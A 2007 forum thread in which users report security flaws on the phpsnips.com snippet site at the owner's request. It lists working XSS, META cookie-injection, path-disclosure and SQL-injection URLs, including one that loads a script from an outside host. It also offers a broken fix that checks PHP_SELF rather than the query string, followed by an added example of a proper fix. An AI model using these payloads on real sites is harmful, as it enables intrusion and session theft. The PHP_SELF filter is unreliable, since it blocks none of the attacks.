The Little Guy, Posted November 27, 2007

There are currently 47 different codes. I have tested each of them, but I may not have found all the errors that may arise, so if you could, please try and test some of my codes. Thanks.

Link: http://phpsnips.com (Direct links to some codes are in Signature)
agentsteal, Posted November 28, 2007

Array:
  http://www.phpsnips.com/help.php?help[]
  http://www.phpsnips.com/help.php?id[]
  http://www.phpsnips.com/search.php?letter[]
  http://www.phpsnips.com/search.php?search_by=1&q[]
  http://www.phpsnips.com/snippet.php?id[]
  http://www.phpsnips.com/snippet_comment.php?id[]
  http://www.phpsnips.com/tempSnip.php?id[]
  http://www.phpsnips.com/temp_snippet_comment.php?id[]
  http://www.phpsnips.com/vote.php?id[]

Cross Site Scripting:
  http://www.phpsnips.com/editTempSnip.php?id="><marquee><h1>vulnerable</marquee>
  http://www.phpsnips.com/help.php?help=<marquee><h1>vulnerable</marquee>
  http://www.phpsnips.com/help.php?id="><marquee><h1>vulnerable</marquee>
  http://www.phpsnips.com/join.php/"><marquee><h1>vulnerable</marquee>
  http://www.phpsnips.com/search.php?letter=<marquee><h1>vulnerable</marquee>
  http://www.phpsnips.com/search.php?search_by=1&q=<marquee><h1>vulnerable</marquee>
  http://www.phpsnips.com/snippet.php?id="><marquee><h1>vulnerable</marquee>
  http://www.phpsnips.com/snippet_comment.php?id="><marquee><h1>vulnerable</marquee>
  http://www.phpsnips.com/tempSnip.php?id="><marquee><h1>vulnerablevulnerable</marquee>
  http://www.phpsnips.com/temp_snippet_comment.php?id="><marquee><h1>vulnerable</marquee>
  There is Cross Site Scripting when you submit a snippet if the title field contains ">code and the code field is null.
  There is Cross Site Scripting when you post a snippet if the title contains code.
  There is Cross Site Scripting on the edit snippet page if the title field contains ">code.
  There is Cross Site Scripting on the edit snippet page if the code field contains </textarea>code.

Full Path Disclosure:
  http://www.phpsnips.com/editTempSnip.php?id[]
  Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /home/.marble/ryannaddy/phpsnips.com/editTempSnip.php on line 71

META Tag Injection:
  http://www.phpsnips.com/help.php?help=<meta+http-equiv='Set-cookie'+content='PHPSESSID=vulnerable'>
  http://www.phpsnips.com/search.php?search_by=1&q=<meta+http-equiv='Set-cookie'+content='PHPSESSID=vulnerable'>

SQL Dump:
  http://www.phpsnips.com/examples/Text1.php

SQL Error:
  http://www.phpsnips.com/help.php?id='
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' group by uniq_id DESC LIMIT 20' at line 1
  http://www.phpsnips.com/search.php?letter='
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' ORDER BY name' at line 1
  http://www.phpsnips.com/snippet.php?id='
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' group by uniq_id DESC LIMIT 20' at line 1
  http://www.phpsnips.com/snippet_comment.php?id='
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
  http://www.phpsnips.com/tempSnip.php?id='
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' group by uniq_id DESC LIMIT 20' at line 1
  http://www.phpsnips.com/temp_snippet_comment.php?id='
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

SQL Injection:
  http://www.phpsnips.com/snippet_comment.php?id=1' AND 1='1
  http://www.phpsnips.com/snippet_comment.php?id=1' AND 1='2
helraizer, Posted November 30, 2007

XSS
  http://www.phpsnips.com/search.php?search_by=1&q=%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E
The Little Guy (Author), Posted November 30, 2007

> XSS
> http://www.phpsnips.com/search.php?search_by=1&q=%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E

How would I fix that??
helraizer, Posted November 30, 2007

> XSS
> http://www.phpsnips.com/search.php?search_by=1&q=%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E
>
> How would I fix that??

A code I made and therefore use is:

    <?php
    // Refuse the request when the requested path contains quote, angle-bracket
    // or slash characters. Note: $_SERVER['PHP_SELF'] holds the script path,
    // not the query string after "?".
    if (stristr($_SERVER['PHP_SELF'], "'") || stristr($_SERVER['PHP_SELF'], '"') ||
        stristr($_SERVER['PHP_SELF'], '<') || stristr($_SERVER['PHP_SELF'], '>') ||
        stristr($_SERVER['PHP_SELF'], '/')) {
        echo "No XSS today, thank you"; // or any other message
    }
    ?>

That stops anyone from adding XSS to the $_GET variables in the URL of the site. For you, that code would go in search.php.

Sam
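As an added example (not code from this thread or from phpsnips.com), here is how the search.php and snippet.php parameters reported above would be handled so that array-valued inputs, quote characters and </textarea> in user data cannot break out of the SQL or the HTML: reject non-scalar parameters, bind SQL parameters, and encode at output. The $pdo connection, the "snippets" table and its columns are assumptions.

```php
<?php
// Added example, not code from this thread or from phpsnips.com.
// Assumed: a "snippets" table with integer id, name and code columns.
ini_set('display_errors', '0');          // keep SQL errors and file paths out of responses
$pdo = new PDO('mysql:host=localhost;dbname=example', 'user', 'pass', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

// Accept only scalar strings: ?q[] and ?id[] arrive as arrays and would otherwise
// reach string functions (the mysql_real_escape_string() warning above).
function scalar_param(string $name): ?string {
    return (isset($_GET[$name]) && is_string($_GET[$name])) ? $_GET[$name] : null;
}
// Encode for HTML text nodes and for single- or double-quoted attributes, so
// "><script>, <meta http-equiv=...> and </textarea> are rendered as literal text.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$id  = filter_var(scalar_param('id') ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
$q   = scalar_param('q') ?? '';
$row = ['name' => '', 'code' => ''];
try {
    if ($id !== false) {
        // Bound parameters are compared as values: id=1' AND 1='1 is not an integer
        // and never reaches the query; a string id cannot alter the statement.
        $stmt = $pdo->prepare('SELECT name, code FROM snippets WHERE id = :id');
        $stmt->execute([':id' => $id]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC) ?: $row;
    }
    // LIKE has its own wildcards; escape them, then bind the pattern.
    $like = '%' . addcslashes($q, '%_\\') . '%';
    $stmt = $pdo->prepare('SELECT name FROM snippets WHERE name LIKE :q ORDER BY name LIMIT 20');
    $stmt->execute([':q' => $like]);
    $hits = $stmt->fetchAll(PDO::FETCH_COLUMN);
} catch (PDOException $e) {
    error_log($e->getMessage());         // details go to the server log only
    http_response_code(500);
    exit('Search is temporarily unavailable.');
}

// Encode at the point of output, once per context the value lands in.
echo '<input type="text" name="q" value="' . h($q) . '">';
echo '<h2>Results for ' . h($q) . '</h2><ul>';
foreach ($hits as $name) {
    echo '<li>' . h($name) . '</li>';
}
echo '</ul><h2>' . h($row['name']) . '</h2>';
echo '<textarea name="code">' . h($row['code']) . '</textarea>';
```

Encoding on output rather than filtering on input also covers the stored cases listed above (a title containing ">code, a code field containing </textarea>), since the data is encoded every time it is rendered, whatever route it took into the database.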